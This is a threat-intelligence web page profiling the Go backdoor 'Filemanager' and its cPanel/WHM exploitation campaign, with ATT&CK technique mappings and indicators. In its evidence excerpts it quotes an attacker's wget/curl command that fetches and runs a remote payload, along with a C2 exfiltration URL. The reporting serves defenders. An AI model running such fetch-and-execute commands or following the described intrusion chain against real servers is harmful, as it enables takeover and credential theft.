Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareRansomwareUsed by 1 actorExploits 1 CVE

filemanager

Filemanager is a cross-platform remote-control trojan/backdoor written in Go that supports Darwin, Linux, and Windows. In the reported campaign, it was deployed after exploitation of the critical cPanel/WHM authentication-bypass vulnerability CVE-2026-41940, primarily against compromised Linux hosting environments. The intrusion chain described in the content includes automated exploitation of the cPanel flaw, installation of SSH persistence, deployment of a PHP webshell, hijacking of cPanel login pages with malicious JavaScript to steal credentials, collection of bash history, SSH data, device information, database passwords, and valiases data, and then installation of Filemanager for persistent remote access. Filemanager exposes a web-based management interface on an attacker-specified port and provides remote administration capabilities including file management, remote command execution, and shell access. The activity is attributed by researchers to the threat actor Mr_Rot13, which used infrastructure including wpsock.com to install Filemanager, alongside wrned.com and cp.dene.de.com in the broader campaign. A Linux AMD64 Filemanager sample is reported with MD5 9305b4ebbb4d39907cf36b62989a6af3.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2026-41940cPanel & WHM Authentication Bypass via Session-File CRLF Injection

The campaign uses an automated infection chain that implants SSH keys, drops a PHP webshell, hijacks login pages, steals credentials, and installs the Filemanager backdoor.

via secpod blogsecpod.com
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Mr_Rot13

The campaign uses an automated infection chain that implants SSH keys, drops a PHP webshell, hijacks login pages, steals credentials, and installs the Filemanager backdoor.

via secpod blogsecpod.com
MITRE ATT&CK

Techniques & procedures

22 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1133External Remote ServicesEvidence1

This vulnerability allows for authentication bypass and grants remote attackers elevated control over the control panel.

T1190Exploit Public-Facing ApplicationEvidence4

Initial Exploitation: CVE-2026-41940 is abused to bypass cPanel/WHM authentication entirely, no credentials needed, full admin access granted remotely.

Execution

3 techniques
T1059Command and Scripting InterpreterEvidence1

The backdoor supports file management, remote command execution, and shell functionality.

T1059.004Unix ShellEvidence2

Infector Delivery: A shell script downloads and runs a Go-based binary from the attacker’s server via wget/curl, then deletes itself to avoid detection.

T1059.006PythonEvidence1

deploys a PHP web shell. This web shell facilitates file management and remote command execution

Persistence

5 techniques
T1098Account ManipulationEvidence1

they deploy an “infector” that first changes the server’s root password and plants a hidden login key so attackers can return via SSH

T1098.004SSH Authorized KeysEvidence2

SSH Implantation: The infector hardcodes a new root password and plants an attacker-controlled SSH public key, ensuring persistent privileged access.

T1133External Remote ServicesEvidence1

This vulnerability allows for authentication bypass and grants remote attackers elevated control over the control panel.

T1505Server Software ComponentEvidence1

implant SSH public keys, PHP Webshells, and malicious JS code, deploy the filemanager remote-control tool

T1505.003Web ShellEvidence3

Webshell Deployment: A PHP webshell (“cpanel.py”) is uploaded to the cPanel CGI directory, enabling persistent file access and remote command execution.

Privilege Escalation

3 techniques
T1068Exploitation for Privilege EscalationEvidence2

CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.

T1098Account ManipulationEvidence1

they deploy an “infector” that first changes the server’s root password and plants a hidden login key so attackers can return via SSH

T1098.004SSH Authorized KeysEvidence2

SSH Implantation: The infector hardcodes a new root password and plants an attacker-controlled SSH public key, ensuring persistent privileged access.

Stealth

2 techniques
T1070Indicator RemovalEvidence1

The malware downloads and runs a backdoor called Filemanager from attacker-controlled servers, then deletes traces of the installer.

T1070.004File DeletionEvidence1

Infector Delivery: A shell script downloads and runs a Go-based binary from the attacker’s server via wget/curl, then deletes itself to avoid detection.

Credential Access

3 techniques
T1056Input CaptureEvidence1

This web shell facilitates file management and remote command execution, and is used to inject JavaScript code that steals login credentials

T1056.003Web Portal CaptureEvidence1

Credential Skimming: Malicious JavaScript replaces the cPanel login page, silently harvesting usernames and passwords and sending them to a ROT13-obfuscated C2.

T1555Credentials from Password StoresEvidence1

The infector also collects sensitive information, such as bash history, SSH data, and database passwords

Collection

3 techniques
T1005Data from Local SystemEvidence3

The infector also collects sensitive information, such as bash history, SSH data, and database passwords

T1056Input CaptureEvidence1

This web shell facilitates file management and remote command execution, and is used to inject JavaScript code that steals login credentials

T1056.003Web Portal CaptureEvidence1

Credential Skimming: Malicious JavaScript replaces the cPanel login page, silently harvesting usernames and passwords and sending them to a ROT13-obfuscated C2.

Command and Control

4 techniques
T1071Application Layer ProtocolEvidence1

sends them to an attacker-controlled server... data is exfiltrated both to the attackers’ own servers and to a private Telegram group

T1071.001Web ProtocolsEvidence1

The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1105Ingress Tool TransferEvidence4

Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'

T1219Remote Access ToolsEvidence4

Deploy Filemanager remote-control tool... Filemanager is a cross-platform backdoor... At runtime, Filemanager listens on the port specified by the port parameter and provides the attacker with a channel for remotely managing the compromised system via a Web page.

Exfiltration

2 techniques
T1041Exfiltration Over C2 ChannelEvidence1

Database passwords, SSH keys, command history, and other data is exfiltrated both to the attackers’ own servers and to a private Telegram group

T1567Exfiltration Over Web ServiceEvidence2

Data Exfiltration: Bash history, SSH keys, database passwords, and valiases are sent to the C2 server and a private Telegram group via dual redundant channels.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
8 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
hash.md5●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping22

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.